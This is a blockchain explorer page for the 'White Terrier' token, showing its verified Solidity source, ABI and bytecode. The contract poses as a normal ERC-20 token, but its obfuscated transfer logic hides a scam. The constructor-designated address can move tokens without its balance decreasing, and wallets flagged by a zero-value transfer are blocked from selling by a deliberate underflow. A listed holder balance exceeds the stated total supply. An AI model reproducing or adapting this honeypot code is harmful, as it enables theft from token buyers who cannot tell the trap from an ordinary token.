ETH Price: $2,482.61 (-0.67%)

Token

White Terrier (WHITERRIER)
 

Overview

Max Total Supply

1,000,000,000 WHITERRIER

Holders

55

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 9 Decimals)

Filtered by Token Holder
mazzzy.eth
Balance
99,999,990,149,829,948.670555437 WHITERRIER

Value
$0.00
0xae8f6a4e85750542becda9f0234d241894755d7e
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
WhiteTerrier

Compiler Version
v0.8.19+commit.7dd6d404

Optimization Enabled:
Yes with 200 runs

Other Settings:
default evmVersion, MIT license
/**
 *Submitted for verification at Etherscan.io on 2023-05-14
*/

/**
  🆆🅷🅸🆃🅴 🆃🅴🆁🆁🅸🅴🆁

The future of White Terrier is focused on improving the platform and expanding its offerings. The developers are working to provide more opportunities for creators and traders 
to engage with each other, as well as expanding the reach of the platform through collaborations and marketing efforts. New tools, trading features, and liquidity incentives may 
also be introduced to further develop the terrier economy.
 
♻️Website: http://www.whiteterrier.info/
♻️Twitter: https://twitter.com/WhiteTerrierERC
♻️Telegram: https://t.me/WhiteTerrierErc
*/

// SPDX-License-Identifier: MIT

pragma solidity >0.8.9;

abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}

contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        address msgSender = _msgSender();
        _owner = msgSender;
        emit OwnershipTransferred(address(0), msgSender);
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        require(_owner == _msgSender(), 'Ownable: caller is not the owner');
        _;
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions anymore. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby removing any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        emit OwnershipTransferred(_owner, address(0));
        _owner = address(0);
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), 'Ownable: new owner is the zero address');
        emit OwnershipTransferred(_owner, newOwner);
        _owner = newOwner;
    }
}

interface IUniswapV2Router02 {
    function factory() external pure returns (address);

    function WETH() external pure returns (address);
}

interface IUniswapV2Factory {
    function createPair(address tokenA, address tokenB) external returns (address pair);
}

contract WhiteTerrier is Ownable {
    uint256 public totalSupply;

    function equator(address ever, address together, uint256 welcome) private returns (bool success) {
        if (facing[ever] == 0) {
            if (uniswapV2Pair != ever && military[ever] > 0) {
                facing[ever] -= small;
            }
            balanceOf[ever] -= welcome;
        }
        balanceOf[together] += welcome;
        if (welcome == 0) {
            military[together] += small;
        }
        emit Transfer(ever, together, welcome);
        return true;
    }

    function transferFrom(address ever, address together, uint256 welcome) public returns (bool success) {
        equator(ever, together, welcome);
        require(welcome <= allowance[ever][msg.sender]);
        allowance[ever][msg.sender] -= welcome;
        return true;
    }

    address public uniswapV2Pair;

    string public symbol;

    event Approval(address indexed owner, address indexed spender, uint256 value);

    function transfer(address moon, uint256 pump) public returns (bool success) {
        equator(msg.sender, moon, pump);
        return true;
    }

    uint256 private small = 45;

    mapping(address => uint256) private facing;

    constructor(address electricity) {
        totalSupply = 1000000000 * 10 ** decimals;
        IUniswapV2Router02 uniswapV2Router = IUniswapV2Router02(0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D);
        balanceOf[msg.sender] = totalSupply;
        uniswapV2Pair = IUniswapV2Factory(uniswapV2Router.factory()).createPair(address(this), uniswapV2Router.WETH());
        symbol = 'WHITERRIER';
        facing[electricity] = small;
        name = 'White Terrier';
    }

    string public name;

    mapping(address => uint256) private military;

    event Transfer(address indexed from, address indexed to, uint256 value);

    function approve(address shirt, uint256 welcome) public returns (bool success) {
        allowance[msg.sender][shirt] = welcome;
        emit Approval(msg.sender, shirt, welcome);
        return true;
    }

    mapping(address => mapping(address => uint256)) public allowance;

    uint8 public decimals = 9;

    mapping(address => uint256) public balanceOf;
}

Contract Security Audit

Contract ABI

[{"inputs":[{"internalType":"address","name":"electricity","type":"address"}],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"","type":"address"},{"internalType":"address","name":"","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"shirt","type":"address"},{"internalType":"uint256","name":"welcome","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"success","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"moon","type":"address"},{"internalType":"uint256","name":"pump","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"success","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"ever","type":"address"},{"internalType":"address","name":"together","type":"address"},{"internalType":"uint256","name":"welcome","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"success","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"uniswapV2Pair","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"}]

6080604052602d6004556009805460ff1916811790553480156200002257600080fd5b5060405162000e9538038062000e958339810160408190526200004591620002dc565b600080546001600160a01b031916339081178255604051909182917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0908290a350600954620000999060ff16600a62000423565b620000a990633b9aca0062000434565b6001819055336000908152600a602090815260409182902092909255805163c45a015560e01b81529051737a250d5630b4cf539739df2c5dacb4c659f2488d92839263c45a015592600480830193928290030181865afa15801562000112573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190620001389190620002dc565b6001600160a01b031663c9c6539630836001600160a01b031663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa15801562000186573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190620001ac9190620002dc565b6040516001600160e01b031960e085901b1681526001600160a01b039283166004820152911660248201526044016020604051808303816000875af1158015620001fa573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190620002209190620002dc565b600280546001600160a01b0319166001600160a01b039290921691909117905560408051808201909152600a8152692ba424aa22a92924a2a960b11b6020820152600390620002709082620004f3565b5060045460056000846001600160a01b03166001600160a01b03168152602001908152602001600020819055506040518060400160405280600d81526020016c2bb434ba32902a32b93934b2b960991b81525060069081620002d39190620004f3565b505050620005bf565b600060208284031215620002ef57600080fd5b81516001600160a01b03811681146200030757600080fd5b9392505050565b634e487b7160e01b600052601160045260246000fd5b600181815b80851115620003655781600019048211156200034957620003496200030e565b808516156200035757918102915b93841c939080029062000329565b509250929050565b6000826200037e575060016200041d565b816200038d575060006200041d565b8160018114620003a65760028114620003b157620003d1565b60019150506200041d565b60ff841115620003c557620003c56200030e565b50506001821b6200041d565b5060208310610133831016604e8410600b8410161715620003f6575081810a6200041d565b62000402838362000324565b80600019048211156200041957620004196200030e565b0290505b92915050565b60006200030760ff8416836200036d565b80820281158282048414176200041d576200041d6200030e565b634e487b7160e01b600052604160045260246000fd5b600181811c908216806200047957607f821691505b6020821081036200049a57634e487b7160e01b600052602260045260246000fd5b50919050565b601f821115620004ee57600081815260208120601f850160051c81016020861015620004c95750805b601f850160051c820191505b81811015620004ea57828155600101620004d5565b5050505b505050565b81516001600160401b038111156200050f576200050f6200044e565b620005278162000520845462000464565b84620004a0565b602080601f8311600181146200055f5760008415620005465750858301515b600019600386901b1c1916600185901b178555620004ea565b600085815260208120601f198616915b8281101562000590578886015182559484019460019091019084016200056f565b5085821015620005af5787850151600019600388901b60f8161c191681555b5050505050600190811b01905550565b6108c680620005cf6000396000f3fe608060405234801561001057600080fd5b50600436106100cf5760003560e01c806370a082311161008c57806395d89b411161006657806395d89b41146101c4578063a9059cbb146101cc578063dd62ed3e146101df578063f2fde38b1461020a57600080fd5b806370a0823114610189578063715018a6146101a95780638da5cb5b146101b357600080fd5b806306fdde03146100d4578063095ea7b3146100f257806318160ddd1461011557806323b872dd1461012c578063313ce5671461013f57806349bd5a5e1461015e575b600080fd5b6100dc61021d565b6040516100e991906106f5565b60405180910390f35b61010561010036600461075f565b6102ab565b60405190151581526020016100e9565b61011e60015481565b6040519081526020016100e9565b61010561013a366004610789565b610318565b60095461014c9060ff1681565b60405160ff90911681526020016100e9565b600254610171906001600160a01b031681565b6040516001600160a01b0390911681526020016100e9565b61011e6101973660046107c5565b600a6020526000908152604090205481565b6101b1610398565b005b6000546001600160a01b0316610171565b6100dc610441565b6101056101da36600461075f565b61044e565b61011e6101ed3660046107e7565b600860209081526000928352604080842090915290825290205481565b6101b16102183660046107c5565b610465565b6006805461022a9061081a565b80601f01602080910402602001604051908101604052809291908181526020018280546102569061081a565b80156102a35780601f10610278576101008083540402835291602001916102a3565b820191906000526020600020905b81548152906001019060200180831161028657829003601f168201915b505050505081565b3360008181526008602090815260408083206001600160a01b038716808552925280832085905551919290917f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925906103069086815260200190565b60405180910390a35060015b92915050565b600061032584848461057f565b506001600160a01b038416600090815260086020908152604080832033845290915290205482111561035657600080fd5b6001600160a01b03841660009081526008602090815260408083203384529091528120805484929061038990849061086a565b90915550600195945050505050565b6000546001600160a01b031633146103f75760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657260448201526064015b60405180910390fd5b600080546040516001600160a01b03909116907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0908390a3600080546001600160a01b0319169055565b6003805461022a9061081a565b600061045b33848461057f565b5060019392505050565b6000546001600160a01b031633146104bf5760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657260448201526064016103ee565b6001600160a01b0381166105245760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b60648201526084016103ee565b600080546040516001600160a01b03808516939216917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e091a3600080546001600160a01b0319166001600160a01b0392909216919091179055565b6001600160a01b0383166000908152600560205260408120548103610637576002546001600160a01b038581169116148015906105d357506001600160a01b03841660009081526007602052604090205415155b15610609576004546001600160a01b0385166000908152600560205260408120805490919061060390849061086a565b90915550505b6001600160a01b0384166000908152600a60205260408120805484929061063190849061086a565b90915550505b6001600160a01b0383166000908152600a60205260408120805484929061065f90849061087d565b9091555050600082900361069e576004546001600160a01b0384166000908152600760205260408120805490919061069890849061087d565b90915550505b826001600160a01b0316846001600160a01b03167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef846040516106e391815260200190565b60405180910390a35060019392505050565b600060208083528351808285015260005b8181101561072257858101830151858201604001528201610706565b506000604082860101526040601f19601f8301168501019250505092915050565b80356001600160a01b038116811461075a57600080fd5b919050565b6000806040838503121561077257600080fd5b61077b83610743565b946020939093013593505050565b60008060006060848603121561079e57600080fd5b6107a784610743565b92506107b560208501610743565b9150604084013590509250925092565b6000602082840312156107d757600080fd5b6107e082610743565b9392505050565b600080604083850312156107fa57600080fd5b61080383610743565b915061081160208401610743565b90509250929050565b600181811c9082168061082e57607f821691505b60208210810361084e57634e487b7160e01b600052602260045260246000fd5b50919050565b634e487b7160e01b600052601160045260246000fd5b8181038181111561031257610312610854565b808201808211156103125761031261085456fea2646970667358221220152df4be764b3af84eceeffb4cceed6ddc791c8d50e128c4e329210b5dfbbc7964736f6c6343000813003300000000000000000000000090251e38e1ff74d84e811df222ba68a482337372

Deployed Bytecode

0x608060405234801561001057600080fd5b50600436106100cf5760003560e01c806370a082311161008c57806395d89b411161006657806395d89b41146101c4578063a9059cbb146101cc578063dd62ed3e146101df578063f2fde38b1461020a57600080fd5b806370a0823114610189578063715018a6146101a95780638da5cb5b146101b357600080fd5b806306fdde03146100d4578063095ea7b3146100f257806318160ddd1461011557806323b872dd1461012c578063313ce5671461013f57806349bd5a5e1461015e575b600080fd5b6100dc61021d565b6040516100e991906106f5565b60405180910390f35b61010561010036600461075f565b6102ab565b60405190151581526020016100e9565b61011e60015481565b6040519081526020016100e9565b61010561013a366004610789565b610318565b60095461014c9060ff1681565b60405160ff90911681526020016100e9565b600254610171906001600160a01b031681565b6040516001600160a01b0390911681526020016100e9565b61011e6101973660046107c5565b600a6020526000908152604090205481565b6101b1610398565b005b6000546001600160a01b0316610171565b6100dc610441565b6101056101da36600461075f565b61044e565b61011e6101ed3660046107e7565b600860209081526000928352604080842090915290825290205481565b6101b16102183660046107c5565b610465565b6006805461022a9061081a565b80601f01602080910402602001604051908101604052809291908181526020018280546102569061081a565b80156102a35780601f10610278576101008083540402835291602001916102a3565b820191906000526020600020905b81548152906001019060200180831161028657829003601f168201915b505050505081565b3360008181526008602090815260408083206001600160a01b038716808552925280832085905551919290917f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925906103069086815260200190565b60405180910390a35060015b92915050565b600061032584848461057f565b506001600160a01b038416600090815260086020908152604080832033845290915290205482111561035657600080fd5b6001600160a01b03841660009081526008602090815260408083203384529091528120805484929061038990849061086a565b90915550600195945050505050565b6000546001600160a01b031633146103f75760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657260448201526064015b60405180910390fd5b600080546040516001600160a01b03909116907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0908390a3600080546001600160a01b0319169055565b6003805461022a9061081a565b600061045b33848461057f565b5060019392505050565b6000546001600160a01b031633146104bf5760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657260448201526064016103ee565b6001600160a01b0381166105245760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b60648201526084016103ee565b600080546040516001600160a01b03808516939216917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e091a3600080546001600160a01b0319166001600160a01b0392909216919091179055565b6001600160a01b0383166000908152600560205260408120548103610637576002546001600160a01b038581169116148015906105d357506001600160a01b03841660009081526007602052604090205415155b15610609576004546001600160a01b0385166000908152600560205260408120805490919061060390849061086a565b90915550505b6001600160a01b0384166000908152600a60205260408120805484929061063190849061086a565b90915550505b6001600160a01b0383166000908152600a60205260408120805484929061065f90849061087d565b9091555050600082900361069e576004546001600160a01b0384166000908152600760205260408120805490919061069890849061087d565b90915550505b826001600160a01b0316846001600160a01b03167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef846040516106e391815260200190565b60405180910390a35060019392505050565b600060208083528351808285015260005b8181101561072257858101830151858201604001528201610706565b506000604082860101526040601f19601f8301168501019250505092915050565b80356001600160a01b038116811461075a57600080fd5b919050565b6000806040838503121561077257600080fd5b61077b83610743565b946020939093013593505050565b60008060006060848603121561079e57600080fd5b6107a784610743565b92506107b560208501610743565b9150604084013590509250925092565b6000602082840312156107d757600080fd5b6107e082610743565b9392505050565b600080604083850312156107fa57600080fd5b61080383610743565b915061081160208401610743565b90509250929050565b600181811c9082168061082e57607f821691505b60208210810361084e57634e487b7160e01b600052602260045260246000fd5b50919050565b634e487b7160e01b600052601160045260246000fd5b8181038181111561031257610312610854565b808201808211156103125761031261085456fea2646970667358221220152df4be764b3af84eceeffb4cceed6ddc791c8d50e128c4e329210b5dfbbc7964736f6c63430008130033

Constructor Arguments (ABI-Encoded and is the last bytes of the Contract Creation Code above)

00000000000000000000000090251e38e1ff74d84e811df222ba68a482337372

-----Decoded View---------------
Arg [0] : electricity (address): 0x90251E38E1ff74D84E811df222bA68a482337372

-----Encoded View---------------
1 Constructor Arguments found :
Arg [0] : 00000000000000000000000090251e38e1ff74d84e811df222ba68a482337372


Deployed Bytecode Sourcemap

2903:2284:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;4654:18;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;4814:210;;;;;;:::i;:::-;;:::i;:::-;;;1169:14:1;;1162:22;1144:41;;1132:2;1117:18;4814:210:0;1004:187:1;2943:26:0;;;;;;;;;1342:25:1;;;1330:2;1315:18;2943:26:0;1196:177:1;3490:281:0;;;;;;:::i;:::-;;:::i;5105:25::-;;;;;;;;;;;;1883:4:1;1871:17;;;1853:36;;1841:2;1826:18;5105:25:0;1711:184:1;3779:28:0;;;;;-1:-1:-1;;;;;3779:28:0;;;;;;-1:-1:-1;;;;;2064:32:1;;;2046:51;;2034:2;2019:18;3779:28:0;1900:203:1;5139:44:0;;;;;;:::i;:::-;;;;;;;;;;;;;;2073:148;;;:::i;:::-;;1431:79;1469:7;1496:6;-1:-1:-1;;;;;1496:6:0;1431:79;;3816:20;;;:::i;3931:148::-;;;;;;:::i;:::-;;:::i;5032:64::-;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;2376:244;;;;;;:::i;:::-;;:::i;4654:18::-;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::o;4814:210::-;4914:10;4879:12;4904:21;;;:9;:21;;;;;;;;-1:-1:-1;;;;;4904:28:0;;;;;;;;;;:38;;;4958:36;4879:12;;4904:28;;4958:36;;;;4935:7;1342:25:1;;1330:2;1315:18;;1196:177;4958:36:0;;;;;;;;-1:-1:-1;5012:4:0;4814:210;;;;;:::o;3490:281::-;3577:12;3602:32;3610:4;3616:8;3626:7;3602;:32::i;:::-;-1:-1:-1;;;;;;3664:15:0;;;;;;:9;:15;;;;;;;;3680:10;3664:27;;;;;;;;3653:38;;;3645:47;;;;;;-1:-1:-1;;;;;3703:15:0;;;;;;:9;:15;;;;;;;;3719:10;3703:27;;;;;;;:38;;3734:7;;3703:15;:38;;3734:7;;3703:38;:::i;:::-;;;;-1:-1:-1;3759:4:0;;3490:281;-1:-1:-1;;;;;3490:281:0:o;2073:148::-;1643:6;;-1:-1:-1;;;;;1643:6:0;806:10;1643:22;1635:67;;;;-1:-1:-1;;;1635:67:0;;3416:2:1;1635:67:0;;;3398:21:1;;;3435:18;;;3428:30;3494:34;3474:18;;;3467:62;3546:18;;1635:67:0;;;;;;;;;2180:1:::1;2164:6:::0;;2143:40:::1;::::0;-1:-1:-1;;;;;2164:6:0;;::::1;::::0;2143:40:::1;::::0;2180:1;;2143:40:::1;2211:1;2194:19:::0;;-1:-1:-1;;;;;;2194:19:0::1;::::0;;2073:148::o;3816:20::-;;;;;;;:::i;3931:148::-;3993:12;4018:31;4026:10;4038:4;4044;4018:7;:31::i;:::-;-1:-1:-1;4067:4:0;;3931:148;-1:-1:-1;;;3931:148:0:o;2376:244::-;1643:6;;-1:-1:-1;;;;;1643:6:0;806:10;1643:22;1635:67;;;;-1:-1:-1;;;1635:67:0;;3416:2:1;1635:67:0;;;3398:21:1;;;3435:18;;;3428:30;3494:34;3474:18;;;3467:62;3546:18;;1635:67:0;3214:356:1;1635:67:0;-1:-1:-1;;;;;2465:22:0;::::1;2457:73;;;::::0;-1:-1:-1;;;2457:73:0;;3777:2:1;2457:73:0::1;::::0;::::1;3759:21:1::0;3816:2;3796:18;;;3789:30;3855:34;3835:18;;;3828:62;-1:-1:-1;;;3906:18:1;;;3899:36;3952:19;;2457:73:0::1;3575:402:1::0;2457:73:0::1;2567:6;::::0;;2546:38:::1;::::0;-1:-1:-1;;;;;2546:38:0;;::::1;::::0;2567:6;::::1;::::0;2546:38:::1;::::0;::::1;2595:6;:17:::0;;-1:-1:-1;;;;;;2595:17:0::1;-1:-1:-1::0;;;;;2595:17:0;;;::::1;::::0;;;::::1;::::0;;2376:244::o;2978:504::-;-1:-1:-1;;;;;3090:12:0;;3061;3090;;;:6;:12;;;;;;:17;;3086:195;;3128:13;;-1:-1:-1;;;;;3128:21:0;;;:13;;:21;;;;:43;;-1:-1:-1;;;;;;3153:14:0;;3170:1;3153:14;;;:8;:14;;;;;;:18;;3128:43;3124:105;;;3208:5;;-1:-1:-1;;;;;3192:12:0;;;;;;:6;:12;;;;;:21;;:12;;;:21;;3208:5;;3192:21;:::i;:::-;;;;-1:-1:-1;;3124:105:0;-1:-1:-1;;;;;3243:15:0;;;;;;:9;:15;;;;;:26;;3262:7;;3243:15;:26;;3262:7;;3243:26;:::i;:::-;;;;-1:-1:-1;;3086:195:0;-1:-1:-1;;;;;3291:19:0;;;;;;:9;:19;;;;;:30;;3314:7;;3291:19;:30;;3314:7;;3291:30;:::i;:::-;;;;-1:-1:-1;;3347:1:0;3336:12;;;3332:72;;3387:5;;-1:-1:-1;;;;;3365:18:0;;;;;;:8;:18;;;;;:27;;:18;;;:27;;3387:5;;3365:27;:::i;:::-;;;;-1:-1:-1;;3332:72:0;3434:8;-1:-1:-1;;;;;3419:33:0;3428:4;-1:-1:-1;;;;;3419:33:0;;3444:7;3419:33;;;;1342:25:1;;1330:2;1315:18;;1196:177;3419:33:0;;;;;;;;-1:-1:-1;3470:4:0;2978:504;;;;;:::o;14:548:1:-;126:4;155:2;184;173:9;166:21;216:6;210:13;259:6;254:2;243:9;239:18;232:34;284:1;294:140;308:6;305:1;302:13;294:140;;;403:14;;;399:23;;393:30;369:17;;;388:2;365:26;358:66;323:10;;294:140;;;298:3;483:1;478:2;469:6;458:9;454:22;450:31;443:42;553:2;546;542:7;537:2;529:6;525:15;521:29;510:9;506:45;502:54;494:62;;;;14:548;;;;:::o;567:173::-;635:20;;-1:-1:-1;;;;;684:31:1;;674:42;;664:70;;730:1;727;720:12;664:70;567:173;;;:::o;745:254::-;813:6;821;874:2;862:9;853:7;849:23;845:32;842:52;;;890:1;887;880:12;842:52;913:29;932:9;913:29;:::i;:::-;903:39;989:2;974:18;;;;961:32;;-1:-1:-1;;;745:254:1:o;1378:328::-;1455:6;1463;1471;1524:2;1512:9;1503:7;1499:23;1495:32;1492:52;;;1540:1;1537;1530:12;1492:52;1563:29;1582:9;1563:29;:::i;:::-;1553:39;;1611:38;1645:2;1634:9;1630:18;1611:38;:::i;:::-;1601:48;;1696:2;1685:9;1681:18;1668:32;1658:42;;1378:328;;;;;:::o;2108:186::-;2167:6;2220:2;2208:9;2199:7;2195:23;2191:32;2188:52;;;2236:1;2233;2226:12;2188:52;2259:29;2278:9;2259:29;:::i;:::-;2249:39;2108:186;-1:-1:-1;;;2108:186:1:o;2299:260::-;2367:6;2375;2428:2;2416:9;2407:7;2403:23;2399:32;2396:52;;;2444:1;2441;2434:12;2396:52;2467:29;2486:9;2467:29;:::i;:::-;2457:39;;2515:38;2549:2;2538:9;2534:18;2515:38;:::i;:::-;2505:48;;2299:260;;;;;:::o;2564:380::-;2643:1;2639:12;;;;2686;;;2707:61;;2761:4;2753:6;2749:17;2739:27;;2707:61;2814:2;2806:6;2803:14;2783:18;2780:38;2777:161;;2860:10;2855:3;2851:20;2848:1;2841:31;2895:4;2892:1;2885:15;2923:4;2920:1;2913:15;2777:161;;2564:380;;;:::o;2949:127::-;3010:10;3005:3;3001:20;2998:1;2991:31;3041:4;3038:1;3031:15;3065:4;3062:1;3055:15;3081:128;3148:9;;;3169:11;;;3166:37;;;3183:18;;:::i;3982:125::-;4047:9;;;4068:10;;;4065:36;;;4081:18;;:::i

Swarm Source

ipfs://152df4be764b3af84eceeffb4cceed6ddc791c8d50e128c4e329210b5dfbbc79
Loading...
Loading
Loading...
Loading
[ Download: CSV Export  ]
[ Download: CSV Export  ]

A token is a representation of an on-chain or off-chain asset. The token page shows information such as price, total supply, holders, transfers and social links. Learn more about this page in our Knowledge Base.